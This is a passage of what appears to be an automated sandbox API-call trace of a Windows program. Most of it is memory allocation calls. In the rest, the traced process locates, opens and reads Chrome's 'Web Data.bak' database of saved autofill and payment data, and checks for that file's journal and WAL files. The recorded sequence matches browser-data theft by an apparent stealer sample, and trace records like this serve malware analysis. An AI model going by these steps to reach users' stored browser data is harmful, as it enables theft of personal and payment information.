	[0219.266] VirtualFree (lpAddress=0x26f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.266] VirtualFree (lpAddress=0x2740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.266] VirtualFree (lpAddress=0x26b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.267] VirtualFree (lpAddress=0x2670000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.267] VirtualFree (lpAddress=0x2690000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.267] VirtualFree (lpAddress=0x25a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.268] VirtualFree (lpAddress=0x25c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.268] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.268] VirtualFree (lpAddress=0x25e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.268] VirtualFree (lpAddress=0x25f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.269] VirtualFree (lpAddress=0x2600000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.269] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.269] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.270] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.270] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.270] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.270] VirtualFree (lpAddress=0x2680000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.271] VirtualFree (lpAddress=0x2660000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.271] VirtualFree (lpAddress=0x2580000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.271] VirtualFree (lpAddress=0x2590000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.277] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x2c) returned 0x38a598
	[0219.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.277] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x1b5f290, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Local") returned 1
	[0219.277] lstrlenA (lpString="C:\\Users\\2XC7u663GxWc\\AppData\\Local") returned 35
	[0219.277] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1000) returned 0x3a2fc0
	[0219.277] lstrlenA (lpString="\\Google\\Chrome\\User Data\\Default\\Web Data.bak") returned 45
	[0219.278] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1000) returned 0x3a3fc8
	[0219.278] VirtualAlloc (lpAddress=0x0, dwSize=0x1d0, flAllocationType=0x3000, flProtect=0x4) returned 0x20000
	[0219.278] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0xe0000
	[0219.278] VirtualAlloc (lpAddress=0x0, dwSize=0x43, flAllocationType=0x3000, flProtect=0x4) returned 0x360000
	[0219.278] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x470000
	[0219.278] VirtualAlloc (lpAddress=0x0, dwSize=0x43, flAllocationType=0x3000, flProtect=0x4) returned 0x520000
	[0219.279] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x530000
	[0219.279] VirtualAlloc (lpAddress=0x0, dwSize=0x42, flAllocationType=0x3000, flProtect=0x4) returned 0x540000
	[0219.279] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x550000
	[0219.279] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x5a0000
	[0219.279] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x5b0000
	[0219.280] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x5c0000
	[0219.280] VirtualAlloc (lpAddress=0x0, dwSize=0x822, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000
	[0219.280] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5a0000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81
	[0219.280] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000
	[0219.280] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5a0000, cbMultiByte=-1, lpWideCharStr=0x5e0000, cchWideChar=81 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak") returned 81
	[0219.280] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51
	[0219.280] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000
	[0219.280] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", nBufferLength=0x54, lpBuffer=0x5f0000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", lpFilePart=0x0) returned 0x50
	[0219.280] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81
	[0219.281] VirtualAlloc (lpAddress=0x0, dwSize=0x51, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000
	[0219.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", cchWideChar=-1, lpMultiByteStr=0x5e0000, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak", lpUsedDefaultChar=0x0) returned 81
	[0219.281] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.281] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.281] VirtualAlloc (lpAddress=0x0, dwSize=0x2f2, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000
	[0219.281] VirtualFree (lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.282] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e01f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81
	[0219.282] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000
	[0219.282] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e01f0, cbMultiByte=-1, lpWideCharStr=0x5d0000, cchWideChar=81 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak") returned 81
	[0219.282] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak"), fInfoLevelId=0x0, lpFileInformation=0x1b5ef54 | out: lpFileInformation=0x1b5ef54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64aa7ee0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x64aa7ee0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0xcc5c0240, ftLastWriteTime.dwHighDateTime=0x1d348db, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1
	[0219.282] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114
	[0219.282] VirtualFree (lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.282] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000
	[0219.282] VirtualQuery (in: lpAddress=0x5d0000, lpBuffer=0x1b5ef98, dwLength=0x1c | out: lpBuffer=0x1b5ef98*(BaseAddress=0x5d0000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.282] VirtualAlloc (lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000
	[0219.283] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1610000
	[0219.283] ReadFile (in: hFile=0x114, lpBuffer=0x1b5f060, nNumberOfBytesToRead=0x64, lpNumberOfBytesRead=0x1b5f04c, lpOverlapped=0x1b5f010 | out: lpBuffer=0x1b5f060*, lpNumberOfBytesRead=0x1b5f04c*=0x64, lpOverlapped=0x1b5f010) returned 1
	[0219.283] VirtualAlloc (lpAddress=0x0, dwSize=0x800, flAllocationType=0x3000, flProtect=0x4) returned 0x1620000
	[0219.283] VirtualQuery (in: lpAddress=0x1620000, lpBuffer=0x1b5eff0, dwLength=0x1c | out: lpBuffer=0x1b5eff0*(BaseAddress=0x1620000, AllocationBase=0x1620000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.283] VirtualAlloc (lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x4) returned 0x1630000
	[0219.283] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1640000
	[0219.284] VirtualFree (lpAddress=0x1610000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.284] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.284] VirtualQuery (in: lpAddress=0x5d0000, lpBuffer=0x1b5eff4, dwLength=0x1c | out: lpBuffer=0x1b5eff4*(BaseAddress=0x5d0000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.284] VirtualFree (lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.284] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000
	[0219.284] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000
	[0219.284] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x1610000
	[0219.285] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1650000
	[0219.285] VirtualAlloc (lpAddress=0x0, dwSize=0x1d4c0, flAllocationType=0x3000, flProtect=0x4) returned 0x1660000
	[0219.285] VirtualQuery (in: lpAddress=0x1660000, lpBuffer=0x1b5f0c0, dwLength=0x1c | out: lpBuffer=0x1b5f0c0*(BaseAddress=0x1660000, AllocationBase=0x1660000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.287] VirtualFree (lpAddress=0x5a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.287] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x5a0000
	[0219.287] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1680000
	[0219.287] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x1690000
	[0219.287] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x16a0000
	[0219.288] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x16f0000
	[0219.288] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x1700000
	[0219.288] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x4) returned 0x1710000
	[0219.288] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x1720000
	[0219.289] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1730000
	[0219.289] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1740000
	[0219.289] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1750000
	[0219.289] VirtualQuery (in: lpAddress=0x1750000, lpBuffer=0x1b5dafc, dwLength=0x1c | out: lpBuffer=0x1b5dafc*(BaseAddress=0x1750000, AllocationBase=0x1750000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.289] VirtualFree (lpAddress=0x1750000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.289] VirtualFree (lpAddress=0x1740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.290] LockFileEx (in: hFile=0x114, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1b5e440 | out: lpOverlapped=0x1b5e440) returned 1
	[0219.290] LockFileEx (in: hFile=0x114, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1b5e42c | out: lpOverlapped=0x1b5e42c) returned 1
	[0219.290] UnlockFileEx (in: hFile=0x114, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x1b5e444 | out: lpOverlapped=0x1b5e444) returned 1
	[0219.290] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e0242, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89
	[0219.290] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x1740000
	[0219.290] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e0242, cbMultiByte=-1, lpWideCharStr=0x1740000, cchWideChar=89 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-journal") returned 89
	[0219.290] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-journal" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak-journal"), fInfoLevelId=0x0, lpFileInformation=0x1b5e438 | out: lpFileInformation=0x1b5e438*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0219.290] GetLastError () returned 0x2
	[0219.290] VirtualFree (lpAddress=0x1740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.290] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e029b, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85
	[0219.290] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x3000, flProtect=0x4) returned 0x1740000
	[0219.291] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e029b, cbMultiByte=-1, lpWideCharStr=0x1740000, cchWideChar=85 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-wal") returned 85
	[0219.291] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-wal" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak-wal"), fInfoLevelId=0x0, lpFileInformation=0x1b5e468 | out: lpFileInformation=0x1b5e468*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0219.291] GetLastError () returned 0x2
	[0219.291] VirtualFree (lpAddress=0x1740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.291] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x1b5e484 | out: lpFileSizeHigh=0x1b5e484*=0x0) returned 0x10000
	[0219.291] VirtualAlloc (lpAddress=0x0, dwSize=0xac80, flAllocationType=0x3000, flProtect=0x4) returned 0x1740000
	[0219.291] VirtualQuery (in: lpAddress=0x1740000, lpBuffer=0x1b5e40c, dwLength=0x1c | out: lpBuffer=0x1b5e40c*(BaseAddress=0x1740000, AllocationBase=0x1740000, AllocationProtect=0x4, RegionSize=0xb000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.292] ReadFile (in: hFile=0x114, lpBuffer=0x174a3e0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5e464, lpOverlapped=0x1b5e428 | out: lpBuffer=0x174a3e0*, lpNumberOfBytesRead=0x1b5e464*=0x800, lpOverlapped=0x1b5e428) returned 1
	[0219.292] ReadFile (in: hFile=0x114, lpBuffer=0x1749b40, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5e198, lpOverlapped=0x1b5e15c | out: lpBuffer=0x1749b40*, lpNumberOfBytesRead=0x1b5e198*=0x800, lpOverlapped=0x1b5e15c) returned 1
	[0219.292] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x1750000
	[0219.292] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1760000
	[0219.292] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1a80000
	[0219.293] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1a90000
	[0219.293] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1aa0000
	[0219.293] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x1ab0000
	[0219.293] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1ac0000
	[0219.294] VirtualAlloc (lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x4) returned 0x1ad0000
	[0219.294] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1ae0000
	[0219.294] VirtualFree (lpAddress=0x1ab0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.294] VirtualFree (lpAddress=0x1ac0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.294] VirtualFree (lpAddress=0x1aa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.295] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1aa0000
	[0219.295] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x1ab0000
	[0219.295] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1ac0000
	[0219.295] VirtualAlloc (lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x4) returned 0x1af0000
	[0219.295] VirtualFree (lpAddress=0x1af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.296] VirtualFree (lpAddress=0x1ab0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.296] VirtualFree (lpAddress=0x1ac0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.296] VirtualFree (lpAddress=0x1aa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.296] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x1aa0000
	[0219.296] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1ab0000
	[0219.297] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1ac0000
	[0219.297] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1af0000
	[0219.297] VirtualQuery (in: lpAddress=0x1af0000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x1af0000, AllocationBase=0x1af0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.297] VirtualFree (lpAddress=0x1af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.297] VirtualFree (lpAddress=0x1ac0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.297] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x1ac0000
	[0219.298] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1af0000
	[0219.298] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x1b00000
	[0219.298] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1b10000
	[0219.298] VirtualAlloc (lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x4) returned 0x1b60000
	[0219.299] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1b70000
	[0219.299] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1b80000
	[0219.299] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x1b90000
	[0219.299] VirtualAlloc (lpAddress=0x0, dwSize=0x1d, flAllocationType=0x3000, flProtect=0x4) returned 0x1ba0000
	[0219.300] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1bb0000
	[0219.300] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x1bc0000
	[0219.300] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1bd0000
	[0219.300] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1be0000
	[0219.300] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1bf0000
	[0219.301] VirtualFree (lpAddress=0x1be0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.301] VirtualFree (lpAddress=0x1bd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.301] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1bd0000
	[0219.301] VirtualQuery (in: lpAddress=0x1b10000, lpBuffer=0x1b5da98, dwLength=0x1c | out: lpBuffer=0x1b5da98*(BaseAddress=0x1b10000, AllocationBase=0x1b10000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.301] VirtualQuery (in: lpAddress=0x1b10000, lpBuffer=0x1b5da94, dwLength=0x1c | out: lpBuffer=0x1b5da94*(BaseAddress=0x1b10000, AllocationBase=0x1b10000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.301] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x1be0000
	[0219.302] VirtualFree (lpAddress=0x1b10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.302] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1b10000
	[0219.302] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1c00000
	[0219.302] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1c10000
	[0219.303] VirtualFree (lpAddress=0x1c00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.303] VirtualFree (lpAddress=0x1b10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.303] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1b10000
	[0219.303] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1c00000
	[0219.303] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x1c20000
	[0219.304] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1d40000
	[0219.304] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1d50000
	[0219.304] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1d60000
	[0219.304] VirtualFree (lpAddress=0x1d50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.304] VirtualFree (lpAddress=0x1d40000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.305] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x1d40000
	[0219.305] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1d50000
	[0219.305] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1d70000
	[0219.305] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1d80000
	[0219.306] VirtualFree (lpAddress=0x1d70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.306] VirtualFree (lpAddress=0x1d50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.306] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1d50000
	[0219.306] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x1d70000
	[0219.307] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1d90000
	[0219.307] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1da0000
	[0219.307] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1db0000
	[0219.307] VirtualFree (lpAddress=0x1da0000, dwSize=0x0, dwFreeType=0x8000) returned 1
